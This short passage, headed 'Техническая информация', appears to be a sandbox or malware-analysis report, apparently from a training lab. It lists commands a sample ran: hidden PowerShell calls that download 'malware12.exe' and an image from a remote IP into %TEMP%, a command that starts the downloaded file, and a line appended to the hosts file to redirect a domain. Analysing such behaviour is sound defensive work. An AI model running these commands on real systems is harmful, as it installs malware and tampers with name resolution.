Техническая информация
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://17#.16.1.71/mal/malware12.exe', '%TEMP%\malware12.exe') &
- '<SYSTEM32>\cmd.exe' /c start %TEMP%\i03.png &
- '<SYSTEM32>\cmd.exe' /c echo 172.16.1.71 contrSys.hacklearning.com >> <DRIVERS>\etc\hosts
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://17#.16.1.71/mal/image04.png', '%TEMP%\i03.png') &
- ClassName: 'Shell_TrayWnd' WindowName: ''